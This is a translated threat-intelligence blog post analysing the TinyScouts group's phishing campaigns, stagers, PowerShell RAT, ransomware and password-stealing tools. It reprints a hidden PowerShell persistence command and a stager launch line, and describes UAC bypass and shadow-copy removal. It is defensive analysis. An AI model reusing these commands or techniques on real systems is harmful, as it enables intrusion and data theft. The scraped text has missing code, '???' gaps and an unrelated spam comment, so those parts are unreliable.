Slightly more complicated than it seems: how the TinyScouts group attacks /Rostelecom-Solar company blog /Habr
Some time ago, we started recording attempts to infect our customers' infrastructures with previously unknown malware. It was delivered to users through phishing emails, sometimes dedicated to the second wave of coronavirus, and sometimes - clearly "sharpened" for the attacked organization and related to its activities. The intruders pretended to be various existing companies, for example, Norilsk Nickel, the Russian Union of Industrialists and Entrepreneurs, Finauditservice, etc.
Two aspects of the group's activities were noteworthy: first, the high level of technical skills of the attackers, and second, the variability of the attack scenario. If you are not interesting as a victim, they will steal passwords and encrypt data, but if your machine is in an interesting domain and has the potential for a more interesting attack development, they will download the Remote Admin Tool (RAT) written in PowerShell. We named the grouping TinyScouts after the names of the functions from the malicious code. In this article, we will tell you about her last two campaigns, which can be conditionally divided by months - July and August 202? and we will do a full analysis of TinyScouts tools and scripts. www.torproject.org/dist/torbrowser/???/tor-win32-???.5.zip
3) the Stager 1:
script is launched using node.exe.
C: WindowsSystem32cmd.exe "/c if not exist hostname (node service ???[.]???)
Below is the deobfuscated Stager 1:
The service script receives the address of the control server as an argument and, when launched, creates the TOR Hidden Service (https://2019.www.torproject.org/docs/onion-services). It is worth noting that when the hidden TOR service is started, its name is generated (it is similar to the name of a regular resource in the TOR network, for example, vkss134jshs22yl3li2ul.onion). Next, the script sends the generated Hidden Service name to the attacker and brings up the local web server. Subsequently, the attacker communicates with the infected system in the request /response mode to the web server (line 19 in the code), where the requests contain the code for execution, and the responses contain the results.
This architecture allows an attacker to gain access to an infected system, even if it is behind NAT (the main condition is the presence of the Internet), and makes it unnecessary to know the victim's "white" IP address.
The first request to the raised web server comes the Decider script, whose task is to determine the fact of the computer joining the domain, as well as to obtain the username. This time, the TeamViewer and RDP presence checks are missing:
After the results of the Decider script are sent to the attacker, a web request is sent to the infected system containing either an encryptor or a RAT, depending on the attacker's interest.
Common modules in both campaigns
Stager 3 script
The main script contains 5 components encoded in base64:
• ransomware Encryptor
• Readme file with message from attackers
• utility WebBrowserPassView
• Mail PassView utility
• Injector. Executable file used to inject WebBrowserPassView and Mail PassView into svchost process. Injection is done with the usual RunPE method.
Stager 3 script functions :
1) Launching the ransomware (Get-Stuff function)
Below is a fragment of the script code with the launch of the ransomware:
2) Bypass UAC (to remove shadow copies)
There are three techniques in the code: using csmtp.exe, CompMgmtLauncher.exe, and fodhelper.exe. You can read about them here , here and here
3) Removing shadow copies
4) Launch WebBrowserPassView and Mail PassView
These are utilities from Nirsoft for extracting passwords from browsers and email clients, respectively.
5) Sending the reports of the aforementioned utilities to the management server.
Before sending, reports are encrypted with the RC4 algorithm with the generated key (4 characters):
The key itself is placed at the beginning of the message:
The readme message looks like this:
The ransomware is a .NET executable file without any obfuscation. Files are encrypted with the AES algorithm. A separate key and initialization vector is generated for each file, which is then encrypted using the RSA public key and placed in the encrypted file. The main function of the ransomware is shown below:
This script has several layers of obfuscation. After decryption, it can execute the following commands:
• delete - self-removal
• exec - execution of the PowerShell command
• download - loading the file
• set_wait_time - change the frequency of command request
• update_tiny - update RAT
• run_module - execute the PowerShell command block
• add_persist_module - add a PowerShell module to the system, which will be executed each time the RAT is started.
• remote_persist_module - remove the module from the RAT startup list.
The deobfuscated command processing function is shown below:
Two keys are used for securing:
1) HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun. The following command is placed in this switch (the line is deobfuscated):
cmd /c PowerShell -windowstyle hidden -nop -c "iex (Get-ItemProperty -Path HKCU: SOFTWAREMicrosoftWindows -Name
2) HKCUSOFTWAREMicrosoftWindows. This is where the script is stored in a value named client_id. Thus, when the system starts, the command from the Run key reads and runs the script from here.
client_id - AppX + base64 (hostname + username + campaign_id)
The pinning function looks like this:
Decrypted script that is placed in Run:
It is worth noting that the malware code is not stored either on disk or in the registry: each time it is loaded anew by the above script.
RAT has the ability to add PowerShell modules that will run on every startup. For this, a separate registry key is used, which stores module identifiers. During startup, this key is checked, and the malware makes a request to the server, downloading all modules by their identifiers.
When the malware starts, the Load-AllPersistModules function is launched to launch all added modules:
The module code is also not stored either on disks or in the registry, like the main body of the RAT.
Interaction with the server
The code contains the CampaignID constant, which is used when registering the RAT at startup (register-tiny function) as the encryption key. The encryption algorithm is RC4. After sending the primary information about the system, the server response contains the encryption key, which will be used in the future with the same algorithm.
Indicators of Compromise:
https[://]late-salad-2839.yriqwzjskbbg.workers[.]dev /raw_stat /stat_launch.php
https[://]late-salad-2839.yriqwzjskbbg.workers[.]dev /raw_stat /stat_fin.php
https[://]late-salad-2839.yriqwzjskbbg.workers[.]dev /web /index.php? r = bag
The authors of the post:
[b] Igor Zalevsky, Head of Cyber Incidents Investigation Department, JSOC CERT 3-3-3435.
Asker Jamirze, Technical Investigation Expert, JSOC CERT 3-3-33437.
It may be interesting
Your post is very helpful to get some effective tips to reduce weight properly. You have shared various nice photos of the same. I would like to thank you for sharing these tips. Surely I will try this at home. Keep updating more simple tips like this. buffet catering service Dudley
Ants removal service